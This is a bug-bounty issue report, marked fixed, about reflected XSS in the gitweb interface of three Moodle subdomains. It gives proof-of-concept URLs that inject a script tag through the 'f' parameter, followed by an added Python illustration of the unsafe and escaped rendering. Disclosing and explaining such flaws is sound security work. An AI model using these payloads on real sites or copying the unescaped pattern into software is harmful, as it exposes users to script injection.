Project: Moodle Community Sites
Issue: MDLSITE-3072

XSS on 3+ Moodle Subdomains


    • Type: Bug
    • Resolution: Fixed
    • Priority: High
    • Component: git.moodle.org
    • None

      To Whom It May Concern,

      I am reporting a few XSS security issues in accordance with your Bug
      Bounty security policy:

      https://moodle.org/mod/forum/view.php?f=996&showall=1

      I have included the proof-of-concepts in the email below to help
      expedite the explanation process.

      The information in the attached file is not public.

      Please feel free to contact me if there are any questions. I look
      forward to working with you in order to remediate the reported issues.

      Thanks,
      Ken

      ------------------------------
      http://git.moodle.org/gw?f=%22/%3E%3Cscript%3Ealert%2810%29%3C/script%3E&a=history&hb=cee922825283e76290b681edda93cf09a03d546b&pg=1\n&p=integration.git
      ---------------------------------
      http://broadcast.moodle.org/gw?f="/><script>alert(10)</script>&a=history&hb=7d19bc135372f5e0dc98776871b0287b9b7353da&pg=1\n&p=moodle.git
      ---------------------------------
      http://conference.moodle.org/gw?f="/><script>alert(10)</script>&a=history&hb=cee922825283e76290b681edda93cf09a03d546b&pg=1\n&p=integration.git
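The three proof-of-concept URLs above all reflect the `f` query parameter into the gitweb page without escaping it for an HTML attribute context, so a double quote in the value closes the attribute and the remainder is parsed as markup. The following Python example is added here for illustration; it is not code from this report, from Moodle or from gitweb. The attribute template around `f` and the helper names are assumptions; the input is constructed from the reported payload, with the `hb` value left out.

```python
import html
from urllib.parse import parse_qs

# Constructed query string: same shape as the reported URLs, with the reflected
# value taken from the report's proof-of-concept and the hb parameter omitted.
POC_QUERY = "f=%22/%3E%3Cscript%3Ealert%2810%29%3C/script%3E&a=history&pg=1"


def get_param(query: str, name: str) -> str:
    """Return the first URL-decoded value of `name` in a query string."""
    return parse_qs(query, keep_blank_values=True).get(name, [""])[0]


def render_unsafe(f: str) -> str:
    # Vulnerable pattern (assumed template): the value is concatenated into a
    # double-quoted attribute unchanged, so a quote in the value ends the
    # attribute and whatever follows becomes new elements.
    return '<input type="hidden" name="f" value="%s"/>' % f


def render_safe(f: str) -> str:
    # Mitigation: escape &, <, >, " and ' before interpolation, so the browser
    # treats the whole value as attribute text rather than as a tag boundary.
    return '<input type="hidden" name="f" value="%s"/>' % html.escape(f, quote=True)


def reflects_script(markup: str) -> bool:
    """Crude check for a successful attribute break-out: a script tag in the output."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    f = get_param(POC_QUERY, "f")
    print("decoded f:", f)
    print("unsafe:", render_unsafe(f), "-> script present:", reflects_script(render_unsafe(f)))
    print("safe:  ", render_safe(f), "-> script present:", reflects_script(render_safe(f)))
```

The decoded parameter is `"/><script>alert(10)</script>`; the unsafe template emits it verbatim, while the escaped template emits `&quot;/&gt;&lt;script&gt;...`, which a browser renders as text inside the attribute. Escaping must be applied at the point of output and must cover quotes, since `html.escape` with `quote=False` would leave the `"` that breaks out of the attribute.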

            Participants: Matt Spurrier (mspurrier), Kenneth Belva (kbelva), David Mudrák (@mudrd8mz)